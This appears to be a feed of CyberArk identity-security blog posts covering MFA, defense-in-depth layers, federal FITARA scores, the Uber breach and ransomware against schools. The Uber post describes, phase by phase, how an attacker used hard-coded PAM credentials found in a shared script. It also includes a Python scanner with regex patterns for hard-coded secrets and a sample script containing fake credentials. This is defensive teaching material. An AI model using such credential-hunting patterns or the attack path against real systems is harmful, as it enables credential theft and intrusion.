See the Bigger Picture and Make a Bigger Impact with Identity Security

Protecting your organization from identity-based threats isn’t about turning on a new solution or holding a phishing awareness webinar to check a box and move on. It’s about thinking bigger and embracing a continuous, defense-in-depth strategy that targets each “layer” of risk with both proactive and reactive security controls, prescriptive guidance for security (practitioners and line of business), and cyber hygiene awareness and best practice adherence from individual users.

This is when Identity Security can help. Centered on intelligent privilege controls, Identity Security is a strategy encompassing people, processes and technology aimed at securing an organization’s most valuable digital assets. Identity Security takes a unified approach by enabling secure just-in-time and standing access for all identities — human and machine — as they access many resources across various complex environments, flexibly automating the identity lifecycle, and continuously detecting and protecting against identity-based threats.

The Four Pillars of Identity Security (Source: Identity Security: Why It Matters and Why Now)

Throughout the month of October, we’re publishing a series of posts highlighting learnings from recent breaches and offering practical guidance aligned with four key identity-centric behaviors identified by CSAM organizers:

  • Enable multifactor authentication (MFA). Enabling seamless, secure access for all identities with adaptive MFA is an important piece of an Identity Security strategy, but it’s not the only one. And, as evidenced by recent MFA fatigue attacks and increasingly stringent cybersecurity insurance requirements, it’s not enough to have MFA technology in place — making sure it’s deployed and managed correctly and consistently is just as critical.
  • Use strong passwords. It’s easy for threat actors to compromise identities through credential theft using tried-and-true methods such as credential stuffing and brute-force attacks. The mathematics of password cracking clearly shows no matter how many times you change your passwords (or mandate password resets across your organization), it won’t be enough. Why? For one thing, it won’t cover the numerous hard-coded credentials in your environment. Through a least privilege-lens, Identity Security blankets all types of passwords, credentials and secrets to significantly reduce the access of any compromised identity and limit the blast radius of an attack.
  • Update software. Patching devices and systems to address security issues and fix bugs has long been a cyber hygiene fundamental. When the Log4j vulnerability entered the scene, this became even more critical. But what happens when an attacker successfully weaponizes a routine update — the very means by which organizations protect themselves — to gain a foothold, compromise identities and abuse privileged credentials to access valuable assets, à la SolarWinds? Updating software today requires a careful balance between automation and manual effort, while always assuming breach and working to contain risk with multiple Identity Security layers.
  • Recognize and report phishing. By carefully studying human behavior and underlying motivations and weaknesses, cyberattackers are, in many ways, the ultimate psychologists. Instead of using this knowledge for good, they exploit people’s natural tendency to trust, and no matter how strong an organization’s technological defenses may be, sophisticated phishing and social engineering attacks often succeed. This may be why 88% of security leaders agree that moving toward a “never trust, always verify” Zero Trust model is so important and why security teams increasingly view Identity Security as the most direct and efficient way to get there.

This Cybersecurity Awareness Month, our aim is to give IT and security professionals like you the Identity Security tips and tools needed to defend against today’s greatest source of risk, support Zero Trust adoption and maximize impact through a holistic approach. Check back soon for more CSAM content, and join us on Twitter, LinkedIn and Facebook to keep the conversation going.

Trust Issues Podcast Playback: Udi Mokady on Identity Security’s Impact https://www.cyberark.com/blog/trust-issues-podcast-playback-udi-mokady-on-identity-securitys-impact/ Fri, 30 Sep 2022 15:50:33 +0000 https://www.cyberark.com/?p=134774

The productivity secrets of highly effective leaders fascinate me – how they’re able to juggle numerous responsibilities, while still finding time to sharpen their skills. Everyone gets the same 24-hour day, but some people can seemingly stretch them out to do more.

As host of the Trust Issues podcast, I recently sat down with CyberArk’s Founder, Chairman and CEO, Udi Mokady, for a discussion grounded in Identity Security, with some scenic detours along the way. During both our on- and off-air chats, I wasn’t surprised to learn he’s got some productivity hacks of his own, one of which involves … podcasts. Mokady is a self-proclaimed podcast aficionado who catches up on his favorite titles during late-evening walks with his dog. It’s a healthy way to unwind, while actively listening and learning on the go.

This notion of impact – in finding new ways to tackle tasks or challenges for stronger effect – was a major theme in our broader, recorded conversation about Identity Security. For instance:

  • Years ago, the desire to help organizations solve a pervasive problem and make a meaningful impact led Mokady and his high school friend to come up with an entirely new way of securing companies’ most critical assets – what would later be known as Privileged Access Management.
  • Strong, impactful customer relationships built on trust and CyberArk’s commitment to staying around for the long term is what continues to shape CyberArk’s trajectory and Identity Security vision today.
  • Cyberattackers are constantly innovating and making their own indelible impact on the world. As ransomware, software supply chain attacks and new threats continue to evolve, security leaders are heroically defending their organizations with a strong sense of mission and an assume breach mindset. And they’re amplifying their impact by coming together to share best practices and collectively tackle challenges.
  • In a typical enterprise, machine identities now outnumber human identities by 45:1, and any one of these identities can be compromised by an attacker. There’s growing urgency to address this expanding identity problem with more impactful security that unifies and simplifies approaches so security teams can get more done and (finally) also have time for a good night’s sleep.

Check out my full conversation with Udi Mokady on the Trust Issues podcast. You can find it on Spotify, Apple Podcasts, Amazon Music and Google Podcasts – or (borrowing Sam Elliott’s golden pipes) … wherever you get your podcasts.

5 Defense-in-Depth Layers for Enabling Secure Access https://www.cyberark.com/blog/5-defense-in-depth-layers-for-enabling-secure-access/ Tue, 27 Sep 2022 15:07:26 +0000 https://www.cyberark.com/?p=134606

Cybersecurity is one of many industries that love jargon. As in the medical and legal professions, complex topics often get crunched into digestible phrases, with the “stickiest” of terms eventually finding their way into our daily cyber speak. But along the way, meanings can get fuzzy.

“Defense-in-depth” can be one of those phrases. The overarching concept is well understood: Instead of relying heavily on one security tool or control, create multiple security layers. This way, controls intended for specific risks can complement one another’s strengths – and if one fails, another stands behind it. In other words, there’s strength in numbers. But what, exactly, does defense-in-depth look like in terms of enabling secure access – how companies verify each user’s identity and give that user secure access to its sensitive resources?

Identity and Access Risk by the Numbers

Let’s start with some numbers. Many cyberattackers have shifted attention from highly privileged IT admins to new workforce populations with direct access to valuable data and systems – business executives, software developers, HR professionals, finance managers, external consultants and others. According to the CyberArk 2022 Identity Security Threat Landscape Report:

  • More than half of organizations’ workforces (52%) have direct access to sensitive corporate data as they work from a variety of locations and on many different devices.
  • The average staff member accesses more than 30 applications and accounts. Any one of these identities can become privileged under certain conditions.

With this workforce identity deluge as a backdrop, we’re breaking down five common areas of access risk, and practical identity-centric defensive layers to help mitigate them.

Read our whitepaper on how you can build a defense-in-depth approach that can secure your organization against identity-focused breaches and attacks.

How to Harden Five Risky Workforce Access Areas

1. Weak or disruptive authentication mechanisms. Since 80% of breaches begin with compromised passwords or credentials, it’s clear that single-factor authentication won’t cut it. Multifactor authentication (MFA) has become a baseline for verifying a user’s identity – traditional approaches require two or more authentication sets at login. But in their own pursuit of innovation, attackers are finding more ways to work around legacy MFA policies, such as tampering with QR codes, hijacking cookies and exploiting user authentication fatigue by “MFA bombing.”

Defensive security layer: Strengthening this security layer isn’t just about adding more controls; it’s about making them smarter and more autonomous. Consider how behavioral analytics and automation could be used to help security teams – and the MFA capabilities they use – better understand individual users’ access habits and build context on what constitutes risk over time. This way, users don’t have to jump through extra authentication hoops unless they’re necessary. And if your smart controls spot a potential threat, they can take action, from presenting extra MFA factors to shutting attackers out.

2. Unprotected endpoints. Less than half (43%) of IT security decision-makers say they apply Identity Security controls to company-supplied user machines. This leaves a wide variety of machines – including physical and virtual desktops and servers – vulnerable to ransomware, phishing and other attacks originating on the endpoint. For example, a user’s workstation could serve as a gateway for attackers to find poorly guarded credentials, exploit the identities of overly privileged users, infiltrate networks, and move through an environment to disable threat detection systems and cause damage.

Defensive security layer: Blending an adaptive form of MFA with endpoint privilege controls can help organizations address risks stemming from a hybrid work infrastructure in which any user’s workstation can be a target.

3. High-risk business applications. Today, 63% of organizations give their typical end user access to between five and 10 (or more) high-value applications, which contain sensitive resources such as financial data, customer information and intellectual property. However, with access comes risk: 80% have experienced end users misusing or abusing access to these applications in the past year. Most identity providers apply an authentication challenge at login to a web session, but what if the user steps away from their screen, leaving the session exposed? 

Defensive security layer: Security controls here are most effective if they continue working to monitor, record and audit user actions after authentication. This enhanced visibility can benefit security teams on many fronts. For instance, 41% say it would enable them to identify the source of a security incident, such as data exfiltration, faster.

4. Third-party vendors. Outside vendors are integral extensions of enterprise teams, and many hold super-user access to internal systems. But with more than 90% of organizations experiencing a security incident linked to an external partner, it’s clear that third parties represent an ever-growing attack vector that requires as much attention as internal privileged users.

Defensive security layer: This layer requires a thoughtful balance between security and productivity, which can be tricky to strike since vendors typically use their own hardware in the process of accessing their enterprise clients’ systems. Finding a way to systematize third-party privileged access vetting and monitoring will go a long way – and the less you can rely on VPNs, passwords or agents to do this, the better.

5. Credentials “living” outside of single sign-on. Properly securing credentials is key to minimizing identity compromise. But that’s really difficult to do when workforce users are required to log in and out of numerous services and apps each day that use different passwords than corporate or single sign-on (SSO) credentials. Making matters worse, these passwords are often stored in unsecure locations or shared with colleagues in unsecure ways out of convenience.

Defensive security layer: In this layer, the password-based credentials of all users – not just the IT admins of the world – are protected by the strong privilege controls of enterprise-level, vault-based storage, because today any workforce user can become highly privileged. Not only does this enhance overall visibility and control for IT security teams, it also makes things easier for users, who can automatically capture and retrieve credentials when they need them.

So, what security vulnerabilities will you uncover once you begin looking at your organization’s attack surface in the context of layers? Whether you see a need to better secure the SSH keys of third-party privileged users or shared app account passwords of everyday employees, it’s time to start thinking more holistically about protecting identities of all types, in all use cases, across the entire lifecycle.

As you uncover gaps, a defense-in-depth strategy can help you introduce multiple Identity Security layers, and human-centric practices such as security awareness training, gamified exercises and frequent phishing tests can further help reduce vulnerabilities and mitigate risk.

Defense-in-depth is a concept that goes hand in hand with a Zero Trust philosophy. But that’s another cybersecurity buzzword for another day.

Read our white paper on how you can build a defense-in-depth approach that can help secure your organization against identity-focused attacks and data breaches.

Why and How Federal Agencies Need to Improve Their FITARA Scorecard https://www.cyberark.com/blog/why-and-how-federal-agencies-need-to-improve-their-fitara-scorecard/ Wed, 21 Sep 2022 13:00:35 +0000 https://www.cyberark.com/?p=134426

In a big, highly anticipated move, last week the White House introduced new cybersecurity guidance to harden federal networks and advance key priorities outlined in President Biden’s May 2021 executive order. While that particular order was aimed at enhancing the security of the software supply chain, the new guidance, and any that follows, seeks to improve the ability of federal agencies to protect their sensitive data, which is accessed across various resources and environments by their employees, partners and contractors.

The new guidance comes at a time when 10 out of the 24 federal agencies are scoring “F” on their overall cybersecurity practices, according to the FITARA Scorecard. These dismal scores reflect the complexity faced by federal agencies, which employ over 4.2 million full-time employees and work with countless contractors under valid contracts that allow external businesses to access sensitive information.

How the FITARA Scorecard grades U.S. federal agency performance

The FITARA Scorecard grades U.S. federal agencies based on their performance of FITARA-related reform and improvement activities and serves as a tool for Congress, chief information officers, agency heads, and outside stakeholders to better understand how agencies across the government are managing and securing their information technology (IT). The Scorecard is also a way for Congress to hold federal agencies accountable for implementing basic and fundamental IT practices that improve the operation of the federal government.

This score tracks the agencies’ ability to continuously monitor their networks using tools to mitigate and remediate cyber threats. Grades are an average of two assessments: scores from their Inspectors General (IG) assessments – which look at agencies’ ability to identify, protect, detect, respond and recover – and progress on cross-agency priority (CAP) cybersecurity goals.

Currently, 10 of the 24 federal agencies score an F on cybersecurity practices.

Here’s why.

4,284,777 is not a random number.

In 2022, the federal government reported a total of 4,284,777 full-time employees working across its three branches (executive, judiciary and legislative). Over 64% of these employees are civilian staff of the executive branch, while 34% are uniformed military. These employees have varying responsibilities across the federal government. Many of them are granted different levels of security clearance that permit access to the most sensitive classified information. It is no easy feat to continuously manage the digital identities of over 4.2 million employees throughout their government service while protecting critical governmental assets related to national security and other public, sensitive priorities.

The threat is real.

Cybersecurity & Infrastructure Security Agency (CISA)’s Risk and Vulnerability Assessment (RVA) is available to both private and public organizations and specifically focuses on identifying network, system and application vulnerabilities by using a repeatable methodology to deliver actionable findings and recommendations.

Results from CISA’s RVAs conducted in FY2021 indicate that valid accounts were used to gain initial access in 51.5% of the FY21 RVAs. The same study indicates that privilege escalation using valid accounts occurred in 47.4% of RVAs. Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop.

The vulnerabilities are multi-fold.

No digital organization can function on its own. Certainly not federal agencies, which operate in conjunction with hundreds of thousands of small, medium and large-sized vendors, to whom more than 358,204 contracts were awarded in 2021. In many cases, large-sized vendors are expected to sub-contract with small and mid-sized businesses when working for the federal agencies.

For example, in the summer of 2019, the Department of Defense (DoD) assessed the security controls implemented by 10 contractors to whom federal contracts of at least $1 million were awarded. The audits reveal that security controls were not consistently implemented in accordance with Federal and DoD requirements for safeguarding Defense CUI. The common shortcomings were:

  • User access was not granted based on the user’s assigned duties, and the principle of least privilege was not applied when granting access;
  • Use of weak passwords;
  • Lack of multi-factor authentication;
  • Failure to mitigate vulnerabilities identified on networks and systems;
  • Placement of CUI on unprotected removable media; and
  • Failure to limit unsuccessful logon attempts to reduce the risk of malicious activity.

These sub-optimal cybersecurity practices are further compounded when many of these large vendors have the ability to sub-contract Federal agency contract work to small and medium businesses that may not have adequate resources to maintain necessary security hygiene.

193 million machine identities are a problem.

The CyberArk 2022 Identity Security Threat Landscape Report indicates that for every human identity, there are 45 machine identities. That means that for 4,284,777 employee identities, federal agencies may be managing over 193 million machine identities. Machine identities need to be protected to secure machine-to-machine communications and authentication, keep communications safe and private, and establish trust between connecting systems. Cyber criminals, malicious insiders and nation-state hackers unfortunately know that most agencies have limited visibility, policy enforcement and remediation of machine identities. This makes certificates and keys easy, high-value targets.

Identity Security with intelligent privileged controls is essential.

Securing identities by implementing a Zero Trust strategy as required by Executive Order 14028 is paramount in the face of such complexity and the increasing number of sophisticated cybersecurity attacks. By enforcing least privilege and enabling just-in-time and standing access for ALL identities – human and machine – federal agencies can easily automate and orchestrate Identity Security processes for holistic protection without security becoming an impediment to productivity.

Identity Security brings privileged controls by integrating identity management, access management and, more importantly, privileged access management. This not only enables Zero Trust but also delivers measurable cyber risk reduction with an integrated approach to securing access for all identities, protecting an organization’s applications, infrastructure and data across a variety of environments.

Federal agencies must seriously consider an Identity Security strategy, especially because of the scale at which they operate and the sensitivity of data they gather for national security.

Improve your FITARA score with the CyberArk Identity Security Platform.

CyberArk’s mission is to provide a modern, holistic, risk-based approach to Identity Security, centered on intelligent privilege controls, to secure access for any identity to any resource or environment from anywhere, using any device.

Built for the dynamic and evolving needs of federal agencies, the CyberArk Identity Security Platform enables secure access for any identity to various resources or environments from anywhere using a variety of devices. CyberArk’s deep security expertise and leadership in privileged access management for over 20 years allows us to expand intelligent privilege controls to a broader range of human and machine identities.

The CyberArk Identity Security Platform enables operational efficiencies with a single admin portal, streamlines meeting compliance requirements with unified audit capabilities, and delivers Identity Security Intelligence for continuous identity threat detection and protection.


Unpacking the Uber Breach https://www.cyberark.com/blog/unpacking-the-uber-breach/ Tue, 20 Sep 2022 20:06:38 +0000 https://www.cyberark.com/?p=134507

In the days following the September 15 Uber breach disclosure, much has been written about how one, allegedly 18-year-old attacker was able to successfully infiltrate the ridesharing giant’s IT infrastructure and gain access to sensitive user data. The human element of this story is getting lots of traction, with many zeroing in on multi-factor authentication (MFA) meltdowns and other Identity Security hygiene issues.

Uber’s September 19 security update answered some questions, while sparking new ones by naming Lapsus$ as a potential attacker group of interest.

As we continue to follow the story, we can’t help but ask, “Does it really matter who the attacker was, or how they got inside?” If you “assume breach,” then what makes this attack noteworthy (beyond the victim organization itself) is what happened after that.

Based on CyberArk Red Team’s analysis and available reports, we’re deconstructing the Uber breach with a focus on hard-coded credentials — the real flash point of this attack — which were reportedly used to gain administrative access to the organization’s privileged access management (PAM) solution (provided by another vendor), unlocking more high-risk access. We’ll also show how layered defenses can work together to help slow down or block similar attacks.

“Much of the Uber cyber attack analysis has focused on social engineering and multiple MFA attack vectors, but the real turning point for the attack happened post initial access. The presence of embedded credentials in a misconfigured network share is critical to deconstructing this attack. It was the harvesting of credentials for a PAM solution, embedded in a PowerShell script, that allowed the attacker to gain high-level access, escalate privileges and set off on a veritable field day inside Uber’s IT environment. Proactive protection relies on implementing multiple security layers, but most importantly, as this attack reinforces, the biggest takeaway is assume breach.”

– Shay Nahari, Vice President, Red Team Services, CyberArk

Deconstructing the Uber Attack: What We Reportedly Know

Phase 1: Initial Access. The attacker got inside Uber’s IT environment by gaining access to credentials to Uber’s VPN infrastructure.

Phase 2: Discovery. Most likely, the contractor whose credentials were used did not have special or elevated privileges to sensitive resources but did have access to a network share, as did other Uber workers. This network share was either open or misconfigured with a broad read ACL. Within the network share, the attacker discovered a PowerShell script containing hard-coded privileged credentials to Uber’s PAM solution.

A brief aside: Both IT teams and developers often automate tasks by creating scripts that need some form of credentials to perform authentication (e.g., manual backup or generating custom reports by pulling data from databases). These credentials could be anything from SSH keys and API tokens to other types of passwords and privileged tokens. To save time and help ensure automation, it’s common for developers to embed (or hard code) these credentials into the code. This leaves the credentials exposed to everyone with access to the code and makes them difficult to manage and rotate. In the Uber breach, hard-coded credentials granted administrative access to a privileged access management solution. These credentials appear not to have been rotated in some time — making them much easier to exploit.

Phase 3: Privilege Escalation, Access PAM System. By harvesting the hard-coded admin credentials for the privileged access management solution, the attacker was able to further escalate privileges.

Phase 4: Access Secrets from PAM System, Reach Critical Company Systems. According to Uber’s latest update, the attacker ultimately gained “elevated permissions to a number of tools.” By accessing secrets from the privileged access management solution, the potential for damage was significant: The attacker reportedly compromised access to the SSO and consoles as well as to the cloud management console where Uber stores sensitive customer and financial data.

Phase 5: Data Exfiltration. While Uber is still investigating the incident, the company confirmed that the attacker “downloaded some internal Slack messages, as well as accessed or downloaded information from an internal tool our finance team uses to manage some invoices.”

Tips for Tackling Embedded Credentials as Part of a Defense-in-Depth Strategy

From our point of view, proactive protection requires defense-in-depth — a mix of complementary security layers — supporting a Zero Trust strategy that utilizes strong least privilege controls. Perhaps most important in this case is to not have embedded credentials in the first place.

To reduce cyber risk in your own organization, we recommend focusing on eliminating this practice, and taking inventory of your environment to find and remove hard-coded credentials that exist in code, PaaS configurations, DevOps tools and internally developed applications. We know this is easier said than done, so focus on your organization’s most critical and powerful credentials and secrets first and then expand these secrets management best practices to measurably reduce risk over time.
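The aside on hard-coded credentials above and the recommendation here to inventory your environment for them both come down to the same practical task: finding credential literals in scripts before an attacker browsing a share does. The following Python scanner is an added example written for this post, not CyberArk's or Uber's code. It reads PowerShell-style scripts and flags the patterns the post describes (a password or token assigned to a variable, a plaintext literal wrapped with ConvertTo-SecureString, a password inside a connection string), skips obvious template placeholders, and redacts every value so the report itself never becomes a second copy of the secret. The sample script, file names and placeholder list are constructed for illustration.

```python
import os
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample: an automation script with credentials embedded the way
# the post describes. It is an illustration, not Uber's actual script.
SAMPLE_SCRIPT = """
# nightly-backup.ps1 (constructed sample)
$VaultUrl = "https://pam.example.internal"
$AdminUser = "svc_backup_admin"
$AdminPassword = "P@ssw0rd-DoNotShip"
$ApiToken = "pam_api_token_0123456789abcdef0123456789abcdef"
$TemplatePassword = "CHANGEME"
$DbConn = "Server=db01;Database=ledger;User Id=app;Password=Sup3rS3cret!;"
$Sec = ConvertTo-SecureString "Hunter2-Legacy" -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential($AdminUser, $Sec)
Invoke-RestMethod -Uri "$VaultUrl/api/backup" -Credential $Cred
""".lstrip("\n")

# Each rule is (kind, regex). Every regex exposes a "value" group holding the
# secret so the report can redact it; the "name" group is optional.
SECRET_WORDS = r"(?:password|passwd|pwd|secret|token|apikey|api_key)"
RULES = [
    # $AdminPassword = "..." : a variable whose name says it holds a secret
    ("assigned_secret",
     re.compile(r'\$(?P<name>\w*?' + SECRET_WORDS + r'\w*)\s*=\s*["\'](?P<value>[^"\']+)["\']', re.I)),
    # ConvertTo-SecureString "literal" -AsPlainText : plaintext wrapped at runtime
    ("plaintext_securestring",
     re.compile(r'ConvertTo-SecureString\s+["\'](?P<value>[^"\']+)["\']\s+-AsPlainText', re.I)),
    # Password=... inside a connection string
    ("connection_string",
     re.compile(r'(?:Password|Pwd)\s*=\s*(?P<value>[^;"\']+)', re.I)),
]

# Template placeholders are not findings (assumed list; tune for your own templates).
PLACEHOLDERS = {"changeme", "<password>", "xxxxxxxx", "example", "todo"}

SCRIPT_EXTENSIONS = (".ps1", ".psm1", ".sh", ".py", ".yml", ".yaml")


@dataclass(frozen=True)
class Finding:
    line_no: int
    kind: str
    variable: str   # "-" when the rule carries no variable name
    redacted: str   # first and last two characters only, never the full secret


def redact(value: str) -> str:
    """Keep just enough of the value to locate it in the file, never the whole secret."""
    if len(value) <= 4:
        return "*" * len(value)
    return value[:2] + "*" * (len(value) - 4) + value[-2:]


def scan_text(text: str) -> List[Finding]:
    """Run every rule over each line; at most one finding is reported per line."""
    findings: List[Finding] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for kind, rule in RULES:
            match = rule.search(line)
            if not match:
                continue
            value = match.group("value")
            if value.strip().lower() in PLACEHOLDERS:
                break  # template placeholder, not a real secret
            name = match.groupdict().get("name") or "-"
            findings.append(Finding(line_no, kind, name, redact(value)))
            break
    return findings


def scan_files(files: Dict[str, str]) -> Dict[str, List[Finding]]:
    """Scan an in-memory {path: contents} map; only script-like files are checked."""
    results: Dict[str, List[Finding]] = {}
    for path, contents in files.items():
        if path.lower().endswith(SCRIPT_EXTENSIONS):
            found = scan_text(contents)
            if found:
                results[path] = found
    return results


def scan_directory(root: str) -> Dict[str, List[Finding]]:
    """Walk a directory (for example a mounted share) and scan the scripts in it."""
    files: Dict[str, str] = {}
    for dirpath, _, filenames in os.walk(root):
        for filename in filenames:
            path = os.path.join(dirpath, filename)
            if path.lower().endswith(SCRIPT_EXTENSIONS):
                with open(path, "r", encoding="utf-8", errors="replace") as handle:
                    files[path] = handle.read()
    return scan_files(files)


def format_report(results: Dict[str, List[Finding]]) -> List[str]:
    """One line per finding, with the secret already redacted."""
    lines = []
    for path, findings in sorted(results.items()):
        for f in findings:
            lines.append(f"{path}:{f.line_no}: {f.kind} ({f.variable}) value={f.redacted}")
    return lines


if __name__ == "__main__":
    # Constructed demo input: the README is ignored because it is not a script.
    demo = {"shares/ops/nightly-backup.ps1": SAMPLE_SCRIPT, "shares/ops/README.txt": SAMPLE_SCRIPT}
    for report_line in format_report(scan_files(demo)):
        print(report_line)
```

Run `scan_directory` against a read-only mount of each share you inventory and feed the report to the team that owns the script; the fix is to move the credential into your secrets management solution and have the script retrieve it at runtime, after which the same scan confirms the file is clean. Regex rules like these are deliberately narrow and will miss secrets in unfamiliar shapes, so treat the scanner as a first pass on the most critical credentials rather than proof of absence.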

After you’ve made a plan for tackling hard-coded credentials, consider these additional steps to harden your defenses:

  • Credential theft remains the No. 1 area of risk. And as seen recently, attackers are getting better at bypassing MFA using a variety of vectors and techniques — there were multiple MFA compromises in this story. Your employees are your gatekeepers — train them regularly to spot and report phishing to help prevent identity compromise. Expect vigilance, but not perfection, as attacks keep evolving.
  • Consistently enforce the principle of least privilege, starting at the endpoint, to help ensure employees and external contractors have the lowest level of permissions possible to do their jobs. Configure privileged access management solutions with least privilege in place. Admins should only have access to privileged accounts that are absolutely necessary for their jobs. All access using privileged accounts should be isolated and authenticated.
  • This attack emphasized the “secret zero” problem that security practitioners have long grappled with: What happens if someone gains access to the ultimate credential that protects all other credentials? This is why strong proactive and reactive defense-in-depth controls are equally critical. So even if MFA falls down, there are additional mechanisms in place to identify and block threats before they reach this point.
  • Minimize standing privileged access. Removing standing access to sensitive infrastructure and web or cloud consoles can help organizations limit an attacker’s lateral movement from an initial compromise toward a powerful security solution. Especially when combined with strong authentication, just-in-time elevation of privileges can greatly reduce the access of any compromised identity, limiting the blast radius of an attacker.

This was not a breach for which a single individual or vendor was at fault, nor was it a breach that a single technology solution could have prevented. That’s why defense-in-depth is so important: It makes it harder for attackers to work, move and, ultimately, accomplish their goals.

K-12 Schools in the Crosshairs of Ransomware https://www.cyberark.com/blog/k-12-schools-in-the-crosshairs-of-ransomware/ Tue, 13 Sep 2022 13:00:17 +0000 https://www.cyberark.com/?p=134273

If staggering staffing shortages, razor-thin budgets, safety issues and politically driven controversies weren’t enough to contend with, U.S. schools are facing another major crisis: skyrocketing ransomware attacks.

You’ve likely read news stories about educational institutions under attack in recent weeks. This timing is no coincidence: A new school year spells new opportunity for attackers. Just last week, the U.S. Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing and Analysis Center (MS-ISAC) issued a joint cybersecurity advisory (CSA) warning that threat actors are “disproportionately targeting the education sector with ransomware attacks,” especially kindergarten through twelfth grade (K-12) institutions.

These attacks have resulted in “restricted access to networks and data, delayed exams, canceled school days and unauthorized access to and theft of personal information regarding students and staff,” CSA authors note.

Why K-12 schools? CyberArk’s Matt Kenslea – whose years of public sector work give him insight into many of today’s top education challenges – says it all comes back to opportunity. “Many attackers go after weakness and many of these schools are understaffed, underfunded and highly vulnerable. The attackers are many, their tools are varied and often-overworked staff can struggle to keep up.”

“School districts, especially those in large, urban environments have to do so much: Feed students, bus students, teach students, provide individualized support for students – many of whom speak different languages – and keep students safe. With so many competing priorities, hiring and keeping specialized cybersecurity staff is a massive challenge,” says Kenslea. “Many school districts don’t – or can’t – make investments in cybersecurity until after an attack.”

According to the CSA, K-12 institutions are also attractive targets given “the amount of sensitive student data accessible through school systems or their managed service providers.” Last year, an NBC News investigation found that ransomware groups had published sensitive personal data on American schoolchildren from more than 1,200 schools.

Frank W. Abagnale, a world-renowned identity fraud expert, has described why cyber criminals prefer to steal the identities of younger people in this way: “I’ll take the student every time. Because a child has no credit, and the child is not likely to seek credit for many years. So I can steal the identity of a two-year-old, I can be that two-year-old for a long period of time before anyone ever finds out I’ve stolen that two-year-old’s identity. That’s why on the black market a two-year-old’s identity sells for a lot more than a 14-year-old’s, simply because you have a lot longer to sell it.”

New-School Ransomware Attacks Target Faculty and Staff Endpoints as an Entry Point

With the benefit of ransomware-as-a-service platforms, it’s easy for just about anyone with internet access to launch an attack on a school. In fact, 56% of K-12 schools worldwide report being hit by ransomware in the last year.

“By and large, ransomware attackers are getting in from local endpoints, such as network-connected PCs, Macs and laptops used by staff and faculty members,” Kenslea explains. Even if anti-virus is installed on the machine, attackers can often slip past it, since these tools rely primarily on known threats and behavior patterns and frequently miss targeted and novel threats (remember, ransomware is constantly changing).

Oftentimes, these endpoint devices have active accounts with local admin rights, which enable device users to perform tasks such as running system or software updates, controlling files and using hardware. The trouble is, those admin rights are exactly what many ransomware attackers need to move further into an environment, deploy malware, encrypt files and hold them for ransom. In almost every instance, attackers look for ways to penetrate, linger and lurk on a system, waiting for opportunities to move laterally and then escalate privileges by compromising accounts with local admin rights.

Even if they aren’t meant to have local admin rights, users sometimes wind up with them anyway. “Scrambling to fill vacant positions, schools are issuing new staff members laptops and getting them into classrooms in a hurry. People make mistakes, especially when they’re rushing,” says Kenslea. Even when schools are on top of managing their Active Directory, they often overlook access control lists (ACLs), and those legacy privileges can be exploited.

The obvious solution would be to just take local admin rights away, right? Not so fast, Kenslea warns. “Education is an open, collaborative environment, teachers share with students, parents and colleagues across the country and the world. Removing local admin rights on all endpoints will create friction and pushback – like when the superintendent can’t even install a printer or read a textbook file. And as they say, ‘You don’t want that smoke.’”

“It can’t be an all or nothing thing,” he continues. “It’s about finding a better balance between permission control and giving very overworked people the access they need to do their jobs.”

Ransomware Blocking at the Endpoint, the Biggest Bang for Schools’ Risk Reduction Buck

In the recent CSA, the FBI, CISA and the MS-ISAC highlight detailed defense-in-depth recommendations for the education sector. Some of these mitigations can be done quickly, such as adding an email banner to emails received from outside the organization. Other steps, such as network segmentation, will take more time and ongoing effort.

For most K-12 schools, ransomware protection ultimately comes down to budget and strategic prioritization. “Since they can’t do everything, schools are looking for the biggest cyber risk reduction ‘bang for their buck,’ in the shortest amount of time possible,” says Kenslea.

“Hardening the endpoint – where ransomware attacks so often begin – is the best place to start,” he continues. To do this, he urges schools to follow the CSA’s guidance of immediately addressing known vulnerabilities, implementing multifactor authentication (MFA) for high-impact actions if it’s not already enforced and getting serious about cybersecurity training to help faculty identify phishing and other credential theft attempts.

As a backstop to those three mitigation steps, he offers a fourth recommendation: “Find a flexible, automatic way to control local admin rights and applications, giving staff, faculty members and other users the lowest clearance level possible that allows them to perform their role.” Also known as least privilege enforcement, this defense-in-depth protection can be rolled out quickly to help schools strengthen their security posture, reduce ransomware exposure and focus on what matters most – shaping lives through learning.

Cybersecurity Basics Build on Fundamental Childhood Lessons https://www.cyberark.com/blog/cybersecurity-basics-build-on-fundamental-childhood-lessons/ Fri, 09 Sep 2022 13:00:05 +0000 https://www.cyberark.com/?p=134144

The human brain grows at an incredible rate during childhood, forming trillions of connections and absorbing information like a sponge. As we grow up, the impact of early life lessons tends to stick around, helping us navigate new situations and simplify complex challenges. Take cybersecurity, for example. When considering ways to protect your digital identities at home and at work, some of the most pertinent advice comes from way back when.

Be yourself. Don’t follow the crowd – especially when it comes to choosing passwords. There’s nothing special or secure about “12345678.” Be creative and use your unique attributes (like your fingerprints, facial structure and voice) as additional security layers to help keep your online accounts and sensitive information safe.

Don’t take candy from strangers. If someone you don’t know offers you something like an email attachment or link, don’t open or click on it. There’s no telling what could be in there. Same goes for phone calls. If someone asks for personal or account information – even if they sound completely legit – don’t fall for it.

Siblings can’t read (or don’t care) about those “KEEP OUT” signs on your door. There was no stopping your sister from barging into your room and rifling through your stuff, so your prized possessions were placed on the top shelf, out of her reach, hidden behind a stack of books – and protected by carefully constructed booby traps and your pet tarantula. She couldn’t get close to your baseball card collection without you finding out. (Yes, we’re still working through a few issues.) A similar strategy can help keep attackers away from your company’s most sensitive data and systems. (Arachnids are an optional layer.)

Everyone makes mistakes. Most cybersecurity incidents start with imperfect people (in other words, everyone) making careless or time-saving security errors. Security is everyone’s job, so make every effort to follow cybersecurity best practices and take advantage of security training, resources and even podcasts to expand your skills and knowledge. But never leave things to chance. At the end of the day, that’s what Zero Trust is all about.

Never stop learning. As smart as you thought you were at eight years old, it turns out you still had a lot to learn (and still do). The cyber threat landscape is always changing, and staying ahead of attackers requires constant learning, innovation and refinement. While it’s impossible to know everything, AI and automation can help fill in gaps, dynamically measure risk and help improve intelligence and performance over time.

